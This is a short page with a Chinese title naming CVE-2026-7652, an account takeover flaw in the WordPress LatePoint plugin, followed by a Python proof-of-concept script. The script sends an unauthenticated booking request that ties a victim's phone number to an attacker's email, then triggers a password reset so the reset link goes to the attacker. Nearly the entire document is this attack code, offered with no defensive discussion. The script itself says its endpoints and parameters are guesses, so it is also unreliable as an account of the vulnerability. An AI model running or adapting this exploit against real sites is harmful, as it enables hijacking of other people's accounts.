CVE-2026-7652 WordPress LatePoint账户接管漏洞

import requests # Exploit Concept for CVE-2026-7652 # Note: This is a conceptual demonstration based on the vulnerability description. # Actual endpoints and parameters depend on the specific plugin configuration. target_url = "http://target-wordpress-site.com" victim_phone = "1234567890" # Victim's known phone number attacker_email = "[email protected]" # Step 1: Trigger the guest booking flow with phone merge # This simulates the unauthenticated booking process that links the phone number to the attacker's email booking_payload = { "action": "latepoint_booking", "customer_phone": victim_phone, "customer_email": attacker_email, "booking_step": "confirm" # Step that triggers the merge/save } try: print(f"[*] Attempting to merge customer record for phone {victim_phone} with email {attacker_email}...") response = requests.post(f"{target_url}/wp-admin/admin-ajax.php", data=booking_payload) if response.status_code == 200: print("[+] Booking request sent. Check if email was propagated.") # Step 2: Trigger WordPress Password Reset # The attacker now initiates a password reset for the victim's username (if known) or relies on the email change reset_payload = { "action": "lostpassword", "user_login": victim_phone, # Or username, depending on WP config "redirect_to": "" } print(f"[*] Triggering password reset to {attacker_email}...") reset_resp = requests.post(f"{target_url}/wp-login.php?action=lostpassword", data=reset_payload) if reset_resp.status_code == 200: print("[+] Password reset requested. If successful, check attacker email for reset link.") else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}")